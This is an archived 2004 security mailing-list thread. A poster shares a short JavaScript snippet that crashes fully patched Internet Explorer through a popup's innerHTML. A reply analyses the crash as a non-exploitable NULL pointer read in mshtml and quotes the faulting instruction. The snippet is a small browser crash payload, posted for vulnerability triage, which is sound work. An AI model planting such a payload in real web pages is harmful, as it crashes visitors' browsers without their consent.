Vulnerability Development mailing list archives

Re: IE Crash - Anyone Seen This Before?

From: "Berend-Jan Wever" <SkyLined () edup tudelft nl>
Date: Sun, 16 May 2004 02:27:34 +0200

NULL pointer assignment in mshtml, not exploitable.
636D54AF    8B48 2C         MOV     ECX, [EAX+2C]
EAX = 0, Bad read of address 0x0000002C.

Cheers,
SkyLined
----- Original Message ----- 
From: "Mike Mauler" <cryptic_mauler () linuxmail org>
To: <full-disclosure () lists netsys com>
Sent: Friday, May 14, 2004 15:55
Subject: [Full-Disclosure] IE Crash - Anyone Seen This Before?


<script type="text/javascript">
Wnd = window.createPopup();
Wnd.document.body.innerHTML='<meta http-equiv="imagetoolbar"

content="no">';

</script>



It crashs the latest IE with all patches. Dont see why it only seems to

work for me with only that META tag. Has anyone seen this before with other
tags or the same bit of code?



Regards,
Nick
-- 
______________________________________________
Check out the latest SMS services @ http://www.linuxmail.org
This allows you to send and receive SMS through your mailbox.


Powered by Outblaze

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

IE Crash - Anyone Seen This Before? Nick Benson (May 14)
- Re: IE Crash - Anyone Seen This Before? xarabas (May 15)
- <Possible follow-ups>
- Re: IE Crash - Anyone Seen This Before? Nick Benson (May 15)
  - Re: IE Crash - Anyone Seen This Before? Adam [Onet] (May 16)
  - Re: IE Crash - Anyone Seen This Before? Berend-Jan Wever (May 16)